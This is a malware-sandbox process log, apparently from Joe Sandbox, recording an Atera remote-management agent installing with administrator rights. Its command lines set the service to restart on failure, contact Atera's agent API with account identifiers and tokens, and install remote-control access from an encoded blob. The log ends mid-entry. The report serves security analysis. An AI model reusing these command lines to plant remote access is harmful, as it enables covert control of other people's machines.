Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 6D26F14034A16EC2E7A017FE2C233455 E Global\MSI0000
Imagebase:	0x7ff70f330000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	12
Start time:	10:12:12
Start date:	11/12/2024
Path:	C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="contato@filosofiaclinicachapeco.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000Of2eLIAR" /AgentId="dfb304ca-1bde-49cc-a755-fa31deeb53c5"
Imagebase:	0x21679140000
File size:	145'968 bytes
MD5 hash:	477293F80461713D51A98A24023D45E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1848077610.000002167B6E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1846105414.00000216792CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1844841948.0000021600001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1844841948.0000021600132000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1844841948.0000021600089000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1845968252.0000021679290000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1844841948.00000216000C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1844841948.0000021600135000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000000.1788379355.0000021679142000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1844841948.00000216000B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1848517334.000002167B921000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1844841948.0000021600166000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1846105414.00000216792C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1850383596.00007FFD9B6C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1848517334.000002167B8ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1846105414.0000021679304000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1844841948.000002160008C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1846105414.0000021679351000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1844841948.000002160017C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, Author: Joe Security
Antivirus matches:	Detection: 26%, ReversingLabs
Has exited:	true

Target ID:	14
Start time:	10:12:17
Start date:	11/12/2024
Path:	C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
Imagebase:	0x1a570d40000
File size:	145'968 bytes
MD5 hash:	477293F80461713D51A98A24023D45E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2356972366.000001A500686000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2356972366.000001A5003CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2389774485.000001A571020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2356972366.000001A5006AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2397219667.000001A5723D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2385596719.000001A570E25000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2356972366.000001A500001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2385596719.000001A570E86000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2397219667.000001A5723FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2356972366.000001A500167000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2354939972.00000043E54F5000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2385596719.000001A570E3C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2385523899.000001A570DF0000.00000004.00000020.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2356972366.000001A5003AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2356972366.000001A500084000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2393257978.000001A571F41000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2393257978.000001A572009000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2356972366.000001A5003A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2356972366.000001A5007A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2356972366.000001A500368000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2404597582.000001A5727E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2385596719.000001A570E00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2397219667.000001A57232D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2397219667.000001A572300000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2393257978.000001A571FA7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2356972366.000001A500409000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2397219667.000001A57236D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2356972366.000001A5003BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2385596719.000001A570E08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2356972366.000001A50046A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2393257978.000001A571F76000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.2356972366.000001A5002C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Target ID:	15
Start time:	10:12:18
Start date:	11/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
Imagebase:	0x7ff7fc0d0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	17
Start time:	10:12:19
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Windows\Installer\MSIE7A0.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5760953 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
Imagebase:	0xd10000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000011.00000003.1853750157.000000000465E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000011.00000002.1912831829.00000000049A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000011.00000002.1912831829.0000000004A47000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Target ID:	20
Start time:	10:12:34
Start date:	11/12/2024
Path:	C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "e2aff9ec-0443-4e2e-911d-1a87ff7f14f5" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Of2eLIAR
Imagebase:	0x28a55180000
File size:	178'728 bytes
MD5 hash:	83FD950ED584099A4125EFBA77E26BAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2037183161.0000028A55612000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2038194012.0000028A6E48E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2036704581.0000028A55300000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2037234967.0000028A556C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2037499219.0000028A55D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2036704581.0000028A55340000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2036704581.0000028A5538E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2037499219.0000028A55CB3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2037499219.0000028A55CC3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2037499219.0000028A55C41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000000.2004500560.0000028A55182000.00000002.00000001.01000000.00000016.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Target ID:	22
Start time:	10:12:39
Start date:	11/12/2024
Path:	C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "63f96359-1827-4d06-be75-18d92a7c1d16" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000Of2eLIAR
Imagebase:	0x205931f0000
File size:	178'728 bytes
MD5 hash:	83FD950ED584099A4125EFBA77E26BAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.2062023214.0000020593C13000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.2061211828.0000020593298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.2061211828.00000205932AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.2061858920.0000020593520000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.2061211828.00000205932CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.2061211828.0000020593315000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.2062023214.0000020593BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.2062023214.0000020593C23000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.2061211828.0000020593290000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Target ID:	25
Start time:	10:12:40
Start date:	11/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
Imagebase:	0x7ff7fc0d0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	27
Start time:	10:12:42
Start date:	11/12/2024
Path:	C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "d2b7b5a8-ee48-431a-b16e-4e13c856aa4f" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000Of2eLIAR
Imagebase:	0x150be850000
File size:	178'728 bytes
MD5 hash:	83FD950ED584099A4125EFBA77E26BAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2295300733.00000150D7D2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2283587990.00000150BF496000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2283587990.00000150BF221000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2282885543.00000150BEB40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2283587990.00000150BF2B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2281891177.00000150BEA4C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2283587990.00000150BF464000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2281891177.00000150BEA10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2291098978.00000150D7A40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2283587990.00000150BF467000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2291524671.00000150D7A7A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2281891177.00000150BEA56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2283587990.00000150BF492000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2291367988.00000150D7A64000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2283587990.00000150BF3CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2281891177.00000150BEA95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2283587990.00000150BF524000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Target ID:	32
Start time:	10:12:43
Start date:	11/12/2024
Path:	C:\Windows\System32\sppsvc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sppsvc.exe
Imagebase:	0x7ff7c1200000
File size:	4'630'384 bytes
MD5 hash:	320823F03672CEB82CC3A169989ABD12
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	33
Start time:	10:12:45
Start date:	11/12/2024
Path:	C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "b0110d28-0ca9-4cdd-bf48-816b1c3482b4" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIiwiUmVxdWVzdFBlcm1pc3Npb25PcHRpb24iOm51bGwsIlJlcXVpcmVQYXNzd29yZE9wdGlvbiI6bnVsbCwiUGFzc3dvcmQiOm51bGx9" 001Q300000Of2eLIAR
Imagebase:	0x23071930000
File size:	72'744 bytes
MD5 hash:	67FEF41237025021CD4F792E8C24E95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2945403740.0000023000103000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2999483708.0000023071BC2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.3009834165.0000023071E20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2945403740.0000023000111000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2999483708.0000023071B8C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2945403740.000002300007B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2941505779.000000E8E6581000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2999483708.0000023071BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000000.2113797571.0000023071932000.00000002.00000001.01000000.0000001A.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2999483708.0000023071B80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2999483708.0000023071C0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2945403740.0000023000001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, Author: Joe Security
Has exited:	false

Target ID:	35
Start time:	10:12:50
Start date:	11/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k smphost
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	38
Start time:	10:13:04
Start date:	11/12/2024
Path:	C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "e532489e-e47a-4c00-92df-b85ef3f9c47f" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000Of2eLIAR
Imagebase:	0x1c2eab50000
File size:	398'384 bytes
MD5 hash:	5E3252E0248B484E76FCDBF8B42A645D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000026.00000002.2376289826.000001C2ECC42000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000026.00000002.2369172218.000001C2EADE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000026.00000002.2369172218.000001C2EADFB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000026.00000002.2369172218.000001C2EAE6D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000026.00000002.2352910675.000001C280001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000026.00000002.2408792996.00007FFDF11A9000.00000004.00000001.01000000.0000001C.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000026.00000002.2352910675.000001C280010000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 